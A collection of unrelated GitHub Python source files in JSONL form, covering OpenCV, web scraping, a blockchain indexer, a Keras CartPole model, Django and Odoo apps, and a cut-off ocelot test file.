+{"seq_id":"74275908007","text":"# author: xwwwb\n# date: 2022-09-21\n# description: 通道分离和合并\nimport cv2\nimport numpy as np\n\nimg = np.zeros((480, 640, 3), np.uint8)\n\nb, g, r = cv2.split(img)\n\nb[10:100,10:100] = 255\ng[10:100,10:100] = 255\n\nimg2 = cv2.merge((b,g,r))\ncv2.imshow('img', img)\ncv2.imshow('b', b)\ncv2.imshow('g',g)\ncv2.imshow('img2',img2)\n\ncv2.waitKey(0)\n","repo_name":"xwwwb/opencv","sub_path":"twelve_channel_split_merge.py","file_name":"twelve_channel_split_merge.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33096190322","text":"from bs4 import BeautifulSoup as soup\r\nfrom urllib.request import urlopen as ureq\r\n\r\nmy_url = 'https://www.imdb.com/search/title/?genres=drama&groups=top_250&sort=user_rating,desc&ref_=adv_prv'\r\n\r\nuClient = ureq(my_url)\r\npage_html = uClient.read()\r\nuClient.close()\r\npage_soup=soup(page_html,\"html.parser\")\r\n\r\ncontainers = page_soup.findAll(\"div\", {\"class\":\"lister-item-content\"})\r\ncontainer=containers[0]\r\n#print(soup.prettify(container))\r\n\r\nfor container1 in containers:\r\n movie_Names=page_soup.find_all('h3', {\"class\":\"lister-item-header\"})\r\n\r\n for movie_Name in movie_Names:\r\n if movie_Name.find('a'):\r\n print(movie_Name.find('a').text)\r\n print(movie_Name.find('span', {\"class\":\"lister-item-year\"}).text)\r\n movie_duration = page_soup.find_all('p', {\"class\": \"text-muted\"}) # .find('span', {\"class\": \"runtime\"}).text\r\n print(movie_duration[0].find('span', {\"class\": \"runtime\"}).text)\r\n #if movie_duration.find('span'):\r\n # print(movie_duration.find_all('span', {\"class\": \"runtime\"}).text)\r\n #print(movie_Name.findAll('div', {\"class\": \"ratings-bar\"}).findAll('div', {\"name\": \"ir\"}).text)\r\n\r\n","repo_name":"ankitalex/WebScrapping","sub_path":"IMDBUsingSoup.py","file_name":"IMDBUsingSoup.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22880713678","text":"#import requests\n\nimport sys\nimport gui\n\n#pip3 install package_name --user\n\n#Get User Input\ndef check_input():\n print(\"checking input...\")\n\n #If user has not quit yet\n while True:\n\n user_input = input(\"Enter \\\"q\\\" or \\\"quit\\\" to exit the program. Enter the Stock Symbol you would like to search for: \")\n print(f\"You entered: {user_input.upper()}\")\n\n if user_input == \"q\" or user_input == \"quit\":\n print(\"Exitting program...\")\n sys.exit()\n else:\n print(\"Running the program...\")\n #getdata.get_data(user_input)\n gui.run_gui(user_input)\n\n\n\ncheck_input()\n\n\n\n\n","repo_name":"KC-Dream/python_stocks_api","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10072612173","text":"from argparse import ArgumentParser\nfrom functools import partial\nfrom glob import iglob\nfrom multiprocessing import cpu_count, Manager, Pool, Queue\nimport os\nimport re\nfrom typing import Optional\n\nfrom pokt import PoktRPCDataProvider\nfrom pokt.index.ingest import ingest_block_range\n\n\ndef chunks_bounds(start_block: int, end_block: int, batch_size: int):\n return [\n (a, b, batch_size)\n for a, b in zip(\n range(start_block, end_block, batch_size),\n list(range(start_block - 1 + batch_size, end_block, batch_size))\n + [end_block],\n )\n ]\n\n\ntotal_txs = 0\ntotal_blocks = 0\ntotal_errors = 0\n\n\ndef progress_reader(queue):\n global total_blocks, total_errors, total_txs\n while not queue.empty():\n try:\n update = queue.get(timeout=0.05)\n if update[0] == \"txs\":\n total_txs += update[1]\n elif update[0] == \"error\":\n total_errors += 1\n else:\n total_blocks += update[1]\n print(\n \"\\rBlocks: {} Transactions: {} Errors: {} \".format(\n total_blocks, total_txs, total_errors\n ),\n end=\"\",\n flush=True,\n )\n except:\n break\n return True\n\n\ndef ingest_chunk(\n start: int,\n end: int,\n batch_size: int,\n queue: Queue,\n rpc_url: str,\n headers: str,\n txs: str,\n msgs: str,\n):\n global total_errors\n try:\n ingest_block_range(\n start,\n end,\n rpc_url,\n headers,\n txs,\n msgs,\n batch_size=batch_size,\n progress_queue=queue,\n )\n except Exception as e:\n print(\"Error encountered during: {} - {}\".format(start, end))\n print(e)\n total_errors += 1\n return queue\n\n\ndef get_latest_block(url):\n rpc = PoktRPCDataProvider(url)\n return rpc.get_height() - 1\n\n\ndef _get_file_last_block(pq_file):\n match = re.match(r\".*block_[0-9]+-([0-9]+)\\.parquet\", pq_file)\n if match:\n return int(match.group(1))\n return 0\n\n\ndef get_last_indexed(headers_dir, txs_dir):\n headers_pattern = os.path.join(headers_dir, \"*.parquet\")\n txs_pattern = os.path.join(txs_dir, \"*.parquet\")\n try:\n headers_last = max([_get_file_last_block(f) for f in iglob(headers_pattern)])\n except ValueError:\n headers_last = 0\n try:\n txs_last = max([_get_file_last_block(f) for f in iglob(txs_pattern)])\n except ValueError:\n txs_last = 0\n if headers_last != txs_last:\n raise RuntimeError(\"Headers and Transactions don't have matching indexes\")\n return txs_last\n\n\ndef run_indexer(\n start_block: int,\n end_block: int,\n rpc_url: str,\n headers: str,\n txs: str,\n msgs: str,\n batch_size: int = 500,\n n_cores: Optional[int] = None,\n):\n man = Manager()\n progress = man.Queue()\n bounds = chunks_bounds(start_block, end_block, batch_size)\n worker = partial(\n ingest_chunk,\n queue=progress,\n rpc_url=rpc_url,\n headers=headers,\n txs=txs,\n msgs=msgs,\n )\n pool = Pool(n_cores)\n for bound in bounds:\n pool.apply_async(worker, args=bound, callback=progress_reader)\n pool.close()\n pool.join()\n print()\n man.shutdown()\n\n\ndef async_main():\n pass\n\n\ndef main():\n default_base = os.getcwd()\n index_default = os.path.join(default_base, \"index\")\n rpc_default = \"http://localhost:8081\"\n parser = ArgumentParser(\n \"pokt-index\", description=\"Index the pocket network blockchain data\"\n )\n parser.add_argument(\n \"-s\",\n \"--start\",\n type=int,\n default=None,\n help=\"The block to start indexing from, defaults to either the first block, or the last indexed block.\",\n )\n parser.add_argument(\n \"-e\",\n \"--end\",\n type=int,\n default=None,\n help=\"The block to index to. Defaults to the latest block.\",\n )\n parser.add_argument(\n \"-j\",\n \"--n-cores\",\n type=int,\n default=None,\n help=\"The number of cores to use when indexing, defaults to 4 less than the total core count.\",\n )\n parser.add_argument(\n \"-u\",\n \"--url\",\n type=str,\n default=rpc_default,\n help=\"The rpc url, defaults to http://localhost:8081.\",\n )\n parser.add_argument(\n \"-d\",\n \"--index-dir\",\n type=str,\n default=index_default,\n help=\"The directory where the indexed files should be written to. Defaults to 'index' of the current working directory.\",\n )\n parser.add_argument(\n \"-b\",\n \"--batch-size\",\n type=int,\n default=250,\n help=\"The number of blocks to write to each parquet file. Defaults to 250.\",\n )\n args = parser.parse_args()\n headers = os.path.join(args.index_dir, \"headers\")\n txs = os.path.join(args.index_dir, \"txs\")\n msgs = os.path.join(args.index_dir, \"tx_msgs\")\n pos = os.path.join(msgs, \"pos\")\n pos_msgs = [\n os.path.join(pos, t)\n for t in (\"MsgStake\", \"MsgBeginUnstake\", \"MsgUnjail\", \"Send\")\n ]\n gov = os.path.join(msgs, \"gov\")\n gov_msgs = [\n os.path.join(gov, t)\n for t in (\"msg_dao_transfer\", \"msg_change_param\", \"msg_upgrade\")\n ]\n apps = os.path.join(msgs, \"apps\")\n apps_msgs = [\n os.path.join(apps, t)\n for t in (\"MsgAppStake\", \"MsgAppUnjail\", \"MsgAppBeginUnstake\")\n ]\n core = os.path.join(msgs, \"pocketcore\")\n core_msgs = [os.path.join(core, t) for t in (\"proof\", \"claim\")]\n dirs = [headers, txs]\n for group in (pos_msgs, gov_msgs, apps_msgs, core_msgs):\n dirs.extend(group)\n for d in dirs:\n if not os.path.exists(d):\n os.makedirs(d)\n start = get_last_indexed(headers, txs) if args.start is None else args.start\n end = get_latest_block(args.url) if args.end is None else args.end\n n_cores = cpu_count() - 4 if args.n_cores is None else args.n_cores\n print(\"Writing batches of {} blocks to {}\".format(args.batch_size, args.index_dir))\n print(\n \"Indexing from block {} to block {} via {} using {} cores\".format(\n start + 1, end, args.url, n_cores\n )\n )\n run_indexer(start + 1, end, args.url, headers, txs, msgs, args.batch_size, n_cores)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pokt-foundation/pypokt","sub_path":"pokt/index/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"17890465023","text":"import gym\nimport tensorflow\nimport time\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.utils import to_categorical\nimport numpy as np\n\nimport gym\nenv = gym.make(\"CartPole-v1\")\n\nminScoreReq = 30\n\n\ndef makeData(initDataX, initDataY, minScoreReq):\n\toneRunDataX = []\n\toneRunDataY = []\n\tscoreTracker = 0\n\tobservation = env.reset()\n\n\n\tfor _ in range(1000):\n\t env.render()\n\t action = env.action_space.sample() # your agent here (this takes random actions)\n\t oneRunDataX.append(observation)\n\t oneRunDataY.append(action)\n\n\t observation, reward, done, info = env.step(action)\n\t scoreTracker = scoreTracker + reward\n\n\t if done:\n\t if(scoreTracker > minScoreReq):\n\t \tinitDataX.append(oneRunDataX)\n\t \tinitDataY.append(oneRunDataY)\n\n\t oneRunDataX = []\n\t oneRunDataY = []\n\t observation = env.reset()\n\t scoreTracker = 0\t\n\n\tenv.close()\n\n\treturn initDataX, initDataY\n\ndef moreData():\n\tobs, act = makeData([], [], minScoreReq)\n\n\tfor i in range(3):\n\t\tobs, act = makeData(obs, act, minScoreReq)\n\t\n\tnp.save(\"feat.npy\", np.array(obs))\n\tnp.save(\"res.npy\", np.array(act))\n\n\treturn obs, act\n\n\n\ndef loadData(file1Name, file2Name):\n\treturn np.load(file1Name), np.load(file2Name)\n\ndef formatData(X):\n\tfinalData = []\n\tfor i in X:\n\t\tfor j in i:\n\t\t\tfinalData.append(j)\n\t\n\treturn np.array(finalData)\n\ndef model():\n\tmodel = Sequential()\n\tmodel.add(Dense(12, input_shape=(4,), activation=\"relu\"))\n\tmodel.add(Dense(8, activation=\"relu\"))\n\tmodel.add(Dense(2, activation=\"sigmoid\"))\n\n\treturn model\n\ndef train(model, X, Y):\n\tmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"accuracy\"])\n\tmodel.fit(X,Y, epochs=100, batch_size=10)\n\treturn model\n\ndef main():\n\t#moreData()\n\tX, Y = loadData(\"feat.npy\", \"res.npy\")\n\tsetModel = model()\n\tX = formatData(X)\n\tY = formatData(Y)\n\tY = to_categorical(Y)\n\n\n\tprint(X)\n\tprint(Y)\n\n\tfinishedModel = train(setModel, X, Y)\n\n\tfinishedModel.save(\"model1.hdf5\")\n\n\n\ndef testResults(modelPath):\n\tobservation = env.reset()\n\ttrainedModel = model()\n\ttrainedModel.load_weights(modelPath)\n\n\tscoreTracker = 0\n\n\tfor i in range(200):\n\t env.render()\n\t action = trainedModel.predict(np.array([observation]))\n\t action = np.argmax(action)\n\n\t observation, reward, done, info = env.step(action)\n\n\t scoreTracker = scoreTracker + reward\n\t if done:\n\t \tobservation = env.reset()\n\t \tprint(\"Simulation performed with a score of {}\".format(scoreTracker))\n\t \tscoreTracker = 0\n\n\n# main()\ntestResults(\"model1.hdf5\")\n\n\n\n\n\n\n\n\n\n\n","repo_name":"malhotra5/OpenAI-Gym-CartPole-Challenge","sub_path":"FNN/FNN.py","file_name":"FNN.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37083399883","text":"from django.http import HttpResponse, HttpResponseRedirect, FileResponse\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views import generic\nfrom django.db.models import Q\nfrom django.conf import settings\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth import logout\nfrom .models import Event, Solution\nfrom .forms import SearchForm\nfrom datetime import datetime\nimport sys, os, tarfile\n\nclass IndexView(generic.ListView):\n template_name = 'wphase/index.html'\n context_object_name = 'latest_event_list'\n\n def get_queryset(self):\n return sorted(Event.objects.all(), key=lambda a: a.date(), reverse=True)[:5]\n\nclass EventView(generic.DetailView):\n model = Event\n template_name = 'wphase/event.html'\n context_object_name = 'event'\n\n def get_context_data(self, **kwargs):\n context = super(EventView, self).get_context_data(**kwargs)\n context[\"solutions\"] = Solution.objects.filter(event=context[\"event\"].eventid)\n return context\n\nclass SolutionView(generic.DetailView):\n model = Solution\n template_name = 'wphase/solution.html'\n\nclass SearchView(generic.ListView):\n template_name = 'wphase/search_form.html'\n context_object_name = 'form'\n\n def get_queryset(self):\n return SearchForm()\n\nclass ResultsView(generic.ListView):\n template_name = 'wphase/results.html'\n context_object_name = 's_results'\n\n def get_queryset(self):\n return None\n\n\ndef search(request):\n # if POST : process the form data\n if request.method == 'POST':\n form = SearchForm(request.POST) # \"binding\" data to form\n if form.is_valid():\n latitude_min = form.cleaned_data['latitude_min']\n latitude_max = form.cleaned_data['latitude_max']\n longitude_min = form.cleaned_data['longitude_min']\n longitude_max = form.cleaned_data['longitude_max']\n depth_min = form.cleaned_data['depth_min']\n depth_max = form.cleaned_data['depth_max']\n year_min = form.cleaned_data['year_min']\n month_min = form.cleaned_data['month_min']\n day_min = form.cleaned_data['day_min']\n year_max = form.cleaned_data['year_max']\n month_max = form.cleaned_data['month_max']\n day_max = form.cleaned_data['day_max']\n mw_min = form.cleaned_data['mw_min']\n mw_max = form.cleaned_data['mw_max']\n NPS_min = form.cleaned_data['NPS_min']\n NPS_max = form.cleaned_data['NPS_max']\n NPD_min = form.cleaned_data['NPD_min']\n NPD_max = form.cleaned_data['NPD_max']\n NPR_min = form.cleaned_data['NPR_min']\n NPR_max = form.cleaned_data['NPR_max']\n stations = form.cleaned_data['stations']\n gap_min = form.cleaned_data['gap_min']\n gap_max = form.cleaned_data['gap_max']\n types_solution = form.cleaned_data['types_solution']\n if types_solution == []:\n types_solution = [\"preferred\"]\n output_format = form.cleaned_data['output_format']\n order_solution = form.cleaned_data['order_solution']\n\n # Filter on solution data\n kwargs_s = {}\n if latitude_min and latitude_max:\n kwargs_s['w_latitude__range'] = (latitude_min,latitude_max)\n if longitude_min and longitude_max:\n kwargs_s['w_longitude__range'] = (longitude_min,longitude_max)\n if depth_min and depth_max:\n kwargs_s['w_depth__range'] = (depth_min,depth_max)\n if mw_min and mw_max:\n kwargs_s['w_mw__range'] = (mw_min,mw_max)\n if stations:\n for s in stations:\n kwargs_s['stations__icontains'] = s\n if gap_min and gap_max:\n kwargs_s['gap__range'] = (gap_min,gap_max)\n\n solutions = Solution.objects.filter(**kwargs_s)\n solutions = solutions.filter( (Q(w_np1_strike__range=(NPS_min,NPS_max))&Q(w_np1_dip__range=(NPD_min,NPD_max))&Q(w_np1_rake__range=(NPR_min,NPR_max))) | (Q(w_np2_strike__range=(NPS_min,NPS_max))&Q(w_np2_dip__range=(NPD_min,NPD_max))&Q(w_np2_rake__range=(NPR_min,NPR_max))) )\n\n # Filter on event data\n events = Event.objects.all()\n # Algorithm probably can be improved...\n if year_min and year_max and month_min and month_max and day_min and day_max:\n events = events.filter( (Q(epi_year__gt=year_min)&Q(epi_year__lt=year_max)) | (Q(epi_year=year_min)&Q(epi_month__gt=month_min)&Q(epi_month__lte=12)) | (Q(epi_year=year_min)&Q(epi_month=month_min)&Q(epi_day__gte=day_min)&Q(epi_day__lte=31)) | (Q(epi_year=year_max)&Q(epi_month__gte=1)&Q(epi_month__lt=month_max)) | (Q(epi_year=year_max)&Q(epi_month=month_max)&Q(epi_day__gte=1)&Q(epi_day__lte=day_max)) )\n\n # Crossing filter results\n e_results = []\n s_results = []\n s_ids = []\n for sol in solutions:\n if (sol.event in events):\n ens = Solution.objects.filter(event=sol.event).values_list('status', flat=True)\n if \"preferred\" in types_solution:\n if \"xy\" in sol.status:\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n elif \"z\" in sol.status and \"wp_xy\" not in ens:\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n elif \"ts\" in sol.status and \"wp_xy\" not in ens and \"wp_z\" not in ens:\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n elif \"th\" in sol.status and \"wp_xy\" not in ens and \"wp_z\" not in ens and \"wp_ts\" not in ens :\n if sol.status[5:] == min([th[5:] for th in ens.filter(status__contains=\"th\")]):\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n elif \"med\" in sol.status and \"wp_xy\" not in ens and \"wp_z\" not in ens and \"wp_ts\" not in ens and not ens.filter(status__contains=\"th\") :\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n else :\n s_results.append(sol)\n s_ids.append(sol.id)\n if (sol.event not in e_results):\n e_results.append(sol.event)\n\n if output_format == \"std\":\n name_file = sol.event_id + \"_\" + sol.status + \".png\"\n path = \"media/\"+name_file\n if not os.path.isfile(path):\n sol.plot(name_file)\n print (\"Picture was created\")\n \n\n # Sorting results\n if (order_solution == 'time'):\n s_results = sorted(s_results, key=lambda a: a.event.date())\n elif (order_solution == 'rev_time'):\n s_results = sorted(s_results, key=lambda a: a.event.date(), reverse=True)\n elif (order_solution == 'mag'):\n s_results = sorted(s_results, key=lambda a: a.w_mw)\n else: # if order_solution == 'rev_mag'\n s_results = sorted(s_results, key=lambda a: a.w_mw, reverse=True)\n\n request.session[\"types_solution\"] = types_solution\n request.session[\"output_format\"] = output_format\n request.session[\"order_solution\"] = order_solution\n\n # For txt saved file\n request.session[\"sol_ids\"] = '_'.join(map(str,s_ids))\n\n # For results pagination\n paginator = Paginator(s_results, 10) # Show 10 results per page\n page = request.GET.get('page')\n try:\n res = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n res = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n res = paginator.page(paginator.num_pages)\n\n return render(request, 'wphase/results.html/', {'s_results':res})\n\n\n # form not valid\n else:\n return render(request, 'wphase/search_form.html',{'error_message': \"Sorry, but the form is not valid.\", 'form':SearchForm()})\n\n # if GET \n else:\n sol_ids = request.session[\"sol_ids\"].split('_')\n sol_ids = map(int, sol_ids)\n s_results = []\n for i in sol_ids:\n s_results.append(Solution.objects.get(pk=i))\n\n # Sorting results\n if (request.session[\"order_solution\"] == 'time'):\n s_results = sorted(s_results, key=lambda a: a.event.date())\n elif (request.session[\"order_solution\"] == 'rev_time'):\n s_results = sorted(s_results, key=lambda a: a.event.date(), reverse=True)\n elif (request.session[\"order_solution\"] == 'mag'):\n s_results = sorted(s_results, key=lambda a: a.w_mw)\n else: # if order_solution == 'rev_mag'\n s_results = sorted(s_results, key=lambda a: a.w_mw, reverse=True)\n\n paginator = Paginator(s_results, 10) # Show 10 results per page\n page = request.GET.get('page')\n try:\n res = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n res = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n res = paginator.page(paginator.num_pages)\n\n return render(request, 'wphase/results.html/', {'s_results':res})\n\n\ndef generate_txt(request, results):\n # Create the HttpResponse object with the appropriate header.\n response = HttpResponse(content_type='text/plain')\n response['Content-Disposition'] = 'attachment; filename=\"results.txt\"'\n\n for r in results.split('_'):\n sol = Solution.objects.get(pk=r)\n txt = sol.event.capsule() + \"\\n\"\n txt += \"event name : \" + sol.event.eventid + \"\\n\"\n txt += \"time shift : \" + str(sol.w_time_shift) + \"\\n\"\n txt += \"half duration : \" + str(sol.w_half_duration) + \"\\n\"\n txt += \"latitude : \" + str(sol.w_latitude) + \"\\n\"\n txt += \"longitude : \" + str(sol.w_longitude) + \"\\n\"\n txt += \"depth : \" + str(sol.w_depth) + \"\\n\"\n txt += \"Mrr : \" + str(sol.w_mrr) + \"\\n\"\n txt += \"Mtt : \" + str(sol.w_mtt) + \"\\n\"\n txt += \"Mpp : \" + str(sol.w_mpp) + \"\\n\"\n txt += \"Mrt : \" + str(sol.w_mrt) + \"\\n\"\n txt += \"Mrp : \" + str(sol.w_mrp) + \"\\n\"\n txt += \"Mtp : \" + str(sol.w_mtp) + \"\\n\\n\"\n response.write(txt)\n\n return response\n\ndef generate_targz(request, results):\n # Create and fill tar.gz file\n runs_results = tarfile.open(\"runs_results.tar.gz\", \"w:gz\")\n runs_path = \"/home/lucile/WPHASE/runs\"\n if os.path.isdir(runs_path):\n for run in os.listdir(runs_path):\n run_path = os.path.join(runs_path, run)\n if os.path.isdir(run_path):\n cmt_path = os.path.join(run_path, \"CMTSOLUTION\")\n if os.path.isfile(cmt_path):\n for r in results.split('_'):\n sol = Solution.objects.get(pk=r)\n with open(cmt_path) as cmt :\n if (sol.event.eventid in cmt.readlines()[1].strip()):\n if run not in runs_results :\n #runs_results.add(os.path.join(runs_path, run), arcname=run)\n runs_results.add(os.path.join(run_path, \"i_master\"), arcname=run+\"/i_master\")\n runs_results.add(os.path.join(run_path, \"CMTSOLUTION\"), arcname=run+\"/CMTSOLUTION\")\n if os.path.isfile(os.path.join(run_path, \"wpinversion.ini\")):\n runs_results.add(os.path.join(run_path, \"wpinversion.ini\"), arcname=run+\"/wpinversion.ini\")\n if os.path.isfile(os.path.join(run_path, \"wpinversion_gs.ini\")):\n runs_results.add(os.path.join(run_path, \"wpinversion_gs.ini\"), arcname=run+\"/wpinversion_gs.ini\")\n if os.path.isfile(os.path.join(run_path, \"WCMTSOLUTION\")):\n runs_results.add(os.path.join(run_path, \"WCMTSOLUTION\"), arcname=run+\"/WCMTSOLUTION\")\n if os.path.isfile(os.path.join(run_path, \"ts_WCMTSOLUTION\")):\n runs_results.add(os.path.join(run_path, \"ts_WCMTSOLUTION\"), arcname=run+\"/ts_WCMTSOLUTION\")\n if os.path.isfile(os.path.join(run_path, \"xy_WCMTSOLUTION\")):\n runs_results.add(os.path.join(run_path, \"xy_WCMTSOLUTION\"), arcname=run+\"/xy_WCMTSOLUTION\")\n if os.path.isfile(os.path.join(run_path, \"p_wpinversion.ps\")):\n runs_results.add(os.path.join(run_path, \"p_wpinversion.ps\"), arcname=run+\"/p_wpinversion.ps\")\n if os.path.isfile(os.path.join(run_path, \"ts_p_wpinversion.ps\")):\n runs_results.add(os.path.join(run_path, \"ts_p_wpinversion.ps\"), arcname=run+\"/ts_p_wpinversion.ps\")\n if os.path.isfile(os.path.join(run_path, \"xy_p_wpinversion.ps\")):\n runs_results.add(os.path.join(run_path, \"xy_p_wpinversion.ps\"), arcname=run+\"/xy_p_wpinversion.ps\")\n if os.path.isfile(os.path.join(run_path, \"o_wpinversion.ps\")):\n runs_results.add(os.path.join(run_path, \"o_wpinversion\"), arcname=run+\"/o_wpinversion\")\n\n runs_results.close()\n\n # Create response\n response = FileResponse(open('runs_results.tar.gz', 'rb'), content_type=\"application/x-gzip\")\n response['Content-Disposition'] = 'attachment; filename=\"runs_results.tar.gz\"'\n\n return response;\n\ndef my_logout(request):\n logout(request)\n return HttpResponseRedirect('/wphase')\n","repo_name":"eost/wphase_catalog","sub_path":"wphase/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34255806321","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\nimport numpy\n\next_modules = [\n Extension(\"helper\", [\"pfibs/helper.pyx\"])\n]\nsetup(name =\"pfibs\",\n version=\"2018.1.0_0.5\",\n author=\"Jeffery Allen, Justin Chang, Innokentiy Protasov\",\n author_email=\"jallen@nrel.gov\",\n url=\"https://github.com/NREL/pfibs\",\n description=\"pFiBS: parallel FEniCS implementation of Block Solvers\",\n packages=[\"pfibs\",\"pfibs.block_preconditioners\"],\n package_dir={\"pfibs\": \"pfibs\"},\n cmdclass = {'build_ext': build_ext},\n ext_modules = ext_modules,\n include_dirs = [numpy.get_include()]\n)\n","repo_name":"NREL/pfibs","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"71654013289","text":"from odoo import api, fields, models, tools, SUPERUSER_ID, _\nfrom odoo.exceptions import UserError, AccessError, ValidationError\nfrom odoo.tools.safe_eval import safe_eval\nfrom datetime import date, datetime, timedelta\nimport logging\n\n_logger = logging.getLogger(__name__)\n\n\nclass SaleRequirementsSaleOrder(models.Model):\n _inherit = 'sale.order'\n\n checklist = fields.Boolean(string=\"Enable Checklist\")\n checklist_progress = fields.Float(string=\"Supplemented\", compute=\"compute_checklist_progress\")\n product_ids = fields.Many2many(string=\"Products in Order Line\", comodel_name=\"product.product\",\n compute=\"populate_product_ids\")\n checklist_ids = fields.Many2many(string=\"Requirements\", comodel_name=\"sale.checklist.items\",\n domain=\"['|',('product_ids','in',product_ids),('always_required','=',True)]\")\n\n @api.depends('checklist_ids')\n def compute_checklist_progress(self):\n for record in self:\n total_len = self.env['sale.checklist.items'].search_count([])\n cl_len = len(record.checklist_ids)\n if total_len != 0:\n record.checklist_progress = (cl_len * 100) / total_len\n\n @api.depends('order_line')\n def populate_product_ids(self):\n for rec in self:\n product_list = []\n for order_line in rec.order_line:\n if order_line.product_id.membership:\n product_list.append(order_line.product_id.id)\n rec.product_ids = [(6, 0, product_list)]\n\n @api.multi\n def action_confirm(self):\n res = super(SaleRequirementsSaleOrder, self).action_confirm()\n if self.checklist:\n if self.checklist_progress == 100:\n return res\n else:\n raise UserError(_('Insufficient Supplemented Requirements'))\n return res\n\nclass SaleRequirementsSaleChecklistItems(models.Model):\n _name = 'sale.checklist.items'\n\n name = fields.Char(string=\"Item\", required=True)\n description = fields.Text(string=\"Description\")\n always_required = fields.Boolean(string=\"Always Required\", default=True)\n product_ids = fields.Many2many(string=\"Membership where this is Required\", comodel_name=\"product.product\",\n domain=\"[('membership','=',True)]\")\n # model_id = fields.Many2one(string=\"Model ID\", comodel_name=\"ir.model\")\n","repo_name":"Jeisonpernia/seaside_premier","sub_path":"sale_customer_requirements/models/sale_customer_requirements.py","file_name":"sale_customer_requirements.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19402871854","text":"from pathlib import Path\n\nimport numpy as np\nimport pytest\n\nfrom ocelot.cpbd.magnetic_lattice import MagneticLattice\nfrom ocelot.cpbd.transformations import SecondTM\nfrom ocelot.cpbd.optics import Navigator\nfrom ocelot.cpbd.track import ParameterScanner\nfrom ocelot.cpbd.io import ParameterScanFile\nfrom ocelot.cpbd.beam import ParticleArray\nfrom ocelot.cpbd.elements import Marker, SBend\n\nPARAMETER_NAME = \"pytest-param-name\"\nPARAMETER_VALUES = [0.3, 0.2]\nPARRAY0S = [ParticleArray(10), ParticleArray(20)]\nMARKER_NAMES = [\"pytest-marker-name-1\", \"pytest-marker-name-2\"]\nFILENAME = \"test.hdf5\"\n\ndef assert_parray_equality(first, second):\n np.testing.assert_equal(first.E, second.E)\n np.testing.assert_equal(first.s, second.s)\n np.testing.assert_equal(first.q_array, second.q_array)\n np.testing.assert_equal(first.rparticles, second.rparticles)\n\n@pytest.fixture\ndef pscanner_file(tmp_path):\n f = ParameterScanFile(tmp_path / FILENAME, \"w\")\n\n for pval, parray0 in zip(PARAMETER_VALUES, PARRAY0S):\n f.new_run_output(pval, parray0, MARKER_NAMES)\n yield f\n f.close()\n\ndef test_ParameterScannerFile_run_names(pscanner_file):\n assert pscanner_file.run_names == [\"run-0\", \"run-1\"]\n\ndef test_ParameterScannerFile_marker_names(pscanner_file):\n assert pscanner_file.marker_names == {\"pytest-marker-name-1\", \"pytest-marker-name-2\"}\n\ndef test_ParameterScannerFile_parameter_values(pscanner_file):\n assert pscanner_file.parameter_values == PARAMETER_VALUES\n\ndef test_ParameterScannerFile_write_parray0(pscanner_file):\n # Assuming len(parray1) == len(parray0)!\n parray0 = ParticleArray.random(10)\n pscanner_file.write_parray0(0, parray0)\n\n parray0_read = next(pscanner_file.parray0s())\n assert_parray_equality(parray0, parray0_read)\n\ndef test_ParameterScannerFile_write_parray1(pscanner_file):\n # Assuming len(parray1) == len(parray0)!\n parray1 = ParticleArray.random(10)\n pscanner_file.write_parray1(0, parray1)\n\n parray1_read = next(pscanner_file.parray1s())\n assert_parray_equality(parray1, parray1_read)\n\ndef test_ParameterScannerFile_write_marker(pscanner_file):\n marker_name = \"pytest-marker-name-1\"\n parray_marker = ParticleArray.random(10)\n pscanner_file.write_parray_marker(0, marker_name, parray_marker)\n\n parray_marker_read = next(pscanner_file.parray_markers(marker_name))\n assert_parray_equality(parray_marker, parray_marker_read)\n\ndef test_ParameterScannerFile_set_parameter_name(pscanner_file):\n new_name = \"Hello there\"\n pscanner_file.parameter_name = new_name\n assert pscanner_file.parameter_name == new_name\n\ndef test_ParameterScannerFile_next_run_name(pscanner_file):\n assert pscanner_file.next_run_name() == \"run-2\"\n\ndef test_ParameterScannerFile_filename(pscanner_file):\n assert Path(pscanner_file.filename).name == FILENAME\n\ndef 